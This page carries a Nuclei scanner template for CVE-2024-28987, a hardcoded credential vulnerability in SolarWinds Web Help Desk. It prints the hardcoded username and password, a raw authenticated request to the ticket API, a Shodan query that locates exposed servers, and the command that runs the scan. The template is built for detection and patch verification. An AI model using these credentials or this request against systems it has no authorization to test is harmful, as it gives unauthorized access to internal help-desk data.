Skip to content
Nuclei Templates

SolarWinds Web Help Desk - Hardcoded Credential

ID: CVE-2024-28987

Severity: critical

Author: iamnoooob,rootxharsh,pdresearch

Tags: cve,cve2024,exposure,solarwinds,help-desk,kev

Description

Section titled “Description”

The SolarWinds Web Help Desk (WHD) software is affected by a hardcoded credential vulnerability, allowing remote unauthenticated user to access internal functionality and modify data.

YAML Source

Section titled “YAML Source”
id: CVE-2024-28987


info:
  name: SolarWinds Web Help Desk - Hardcoded Credential
  author: iamnoooob,rootxharsh,pdresearch
  severity: critical
  description: |
    The SolarWinds Web Help Desk (WHD) software is affected by a hardcoded credential vulnerability, allowing remote unauthenticated user to access internal functionality and modify data.
  reference:
    - https://support.solarwinds.com/SuccessCenter/s/article/SolarWinds-Web-Help-Desk-12-8-3-Hotfix-2
    - https://www.solarwinds.com/trust-center/security-advisories/cve-2024-28987
    - https://nvd.nist.gov/vuln/detail/CVE-2024-28987
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
    cvss-score: 9.1
    cve-id: CVE-2024-28987
    cwe-id: CWE-798
    epss-score: 0.00091
    epss-percentile: 0.39649
  metadata:
    verified: true
    max-request: 1
    shodan-query: http.favicon.hash:1895809524
  tags: cve,cve2024,exposure,solarwinds,help-desk,kev


variables:
  username: "helpdeskIntegrationUser"
  password: "dev-C4F8025E7"


http:
  - raw:
      - |
        GET /helpdesk/WebObjects/Helpdesk.woa/ra/OrionTickets/ HTTP/1.1
        Host: {{Hostname}}
        Authorization: Basic {{base64(username+':'+password)}}
        Content-Type: application/x-www-form-urlencoded


    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - displayClient
          - shortDetail
        condition: and


      - type: status
        status:
          - 200
# digest: 4a0a00473045022100e01fadc31d52e40f4e124f9e2e14972cb30e7734819b4f5811874aaa223812c002202bfc8920c69928292e9eab85897d9ac11220b937e8e000e768ca217b4fcb1c20:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2024/CVE-2024-28987.yaml"

View on Github